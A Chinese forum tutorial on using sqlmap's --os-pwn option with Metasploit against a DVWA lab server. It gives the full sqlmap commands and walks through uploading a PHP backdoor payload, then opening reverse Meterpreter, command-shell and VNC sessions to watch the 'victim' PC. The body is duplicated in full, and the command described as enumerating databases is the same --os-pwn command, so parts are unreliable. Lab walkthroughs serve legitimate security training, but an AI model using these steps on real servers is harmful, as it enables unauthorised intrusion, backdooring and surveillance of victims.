渗透工具实战:利用Sqlmap和Metaasp来渗透测试网站服务器(OS-Pwn)
zevseo 长老 330 0
这个文章是关于如何使用sqlmap进行sql注入来破解受害者pc并获得shell访问权限。在这里我执行了sql攻击以获得三种不同类型的shell(meterpreter;命令shell; VNC)
需求:
Xampp / Wamp服务器
DVWA实验室
Kali Linux:Burpsuite,sqlmap工具
首先,您需要在XAMPP或WAMP服务器中安装DVWA实验室,请阅读此处的完整文章
现在打开电脑中的DVWA并使用以下凭据登录:
用户名 - admin
密码 - 密码
单击 DVWA Security 并将网站安全级别设置为 低
从漏洞列表中选择SQL Injection以进行攻击。 在文本框中键入 用户ID:1。不设置浏览器代理,请不要单击提交按钮。设置浏览器代理以使burp套件正常工作。
打开burp套件点击菜单栏中的代理 , 然后 按下按钮。回来并点击 dvwa中的提交按钮。Burp将在获取的数据下提供“cookie”和“referrer”,稍后将在sqlmap命令中使用。
让我们使用sqlmap命令下的“referrer和cookies”枚举所有数据库名称。
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
它已经转储了所有数据库的名称。现在我将选择dvwa来访问其后端数据库管理系统。
现在输入以下命令来访问Web服务器的shell并按照屏幕截图显示。
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
类型1为Metasploit的框架建立然后反向连接键入4 为 PHP的 有效载荷支持服务器和再次 键入1为 共同的位置对于可写目录 上传有效载荷(payload )作为受害者PC后门。
这里类型1用于reverse tcp连接作为默认选项。现在我将逐个选择这三个有效负载并尝试每次都破解Web服务器。现在输入1作为meterpreter。
它将加载metasploit框架并提供meterpreter会话1。
重复整个过程,直到反向tcp连接进一步要求选择有效负载,然后输入2作为shell。
它将再次加载metasploit框架并提供命令shell会话1。
重复整个过程直到反向tcp连接(everse tcp connection),当它进一步要求选择有效载荷时,这次现在为VNC 键入3 。
它将再次加载metasploit框架和launchVNC查看器。
在这里,您可以从给定的屏幕截图中看到我通过tightVNC访问受害者pc,现在受害者每一刻都将被保留在我的观察之下。因此我们用各种类型的shell攻击受害者pc三次。
需求:
Xampp / Wamp服务器
DVWA实验室
Kali Linux:Burpsuite,sqlmap工具
首先,您需要在XAMPP或WAMP服务器中安装DVWA实验室,请阅读此处的完整文章
现在打开电脑中的DVWA并使用以下凭据登录:
用户名 - admin
密码 - 密码
单击 DVWA Security 并将网站安全级别设置为 低
从漏洞列表中选择SQL Injection以进行攻击。 在文本框中键入 用户ID:1。不设置浏览器代理,请不要单击提交按钮。设置浏览器代理以使burp套件正常工作。
打开burp套件点击菜单栏中的代理 , 然后 按下按钮。回来并点击 dvwa中的提交按钮。Burp将在获取的数据下提供“cookie”和“referrer”,稍后将在sqlmap命令中使用。
让我们使用sqlmap命令下的“referrer和cookies”枚举所有数据库名称。
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
它已经转储了所有数据库的名称。现在我将选择dvwa来访问其后端数据库管理系统。
现在输入以下命令来访问Web服务器的shell并按照屏幕截图显示。
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn
类型1为Metasploit的框架建立然后反向连接键入4 为 PHP的 有效载荷支持服务器和再次 键入1为 共同的位置对于可写目录 上传有效载荷(payload )作为受害者PC后门。
这里类型1用于reverse tcp连接作为默认选项。现在我将逐个选择这三个有效负载并尝试每次都破解Web服务器。现在输入1作为meterpreter。
它将加载metasploit框架并提供meterpreter会话1。
重复整个过程,直到反向tcp连接进一步要求选择有效负载,然后输入2作为shell。
它将再次加载metasploit框架并提供命令shell会话1。
重复整个过程直到反向tcp连接(everse tcp connection),当它进一步要求选择有效载荷时,这次现在为VNC 键入3 。
它将再次加载metasploit框架和launchVNC查看器。
在这里,您可以从给定的屏幕截图中看到我通过tightVNC访问受害者pc,现在受害者每一刻都将被保留在我的观察之下。因此我们用各种类型的shell攻击受害者pc三次。
组图
黑客安全资讯
Web渗透测试安全培训
代码审计
渗透测试工具
命令执行漏洞
知识问答
原创投稿
文件上传漏洞
逆向与编程
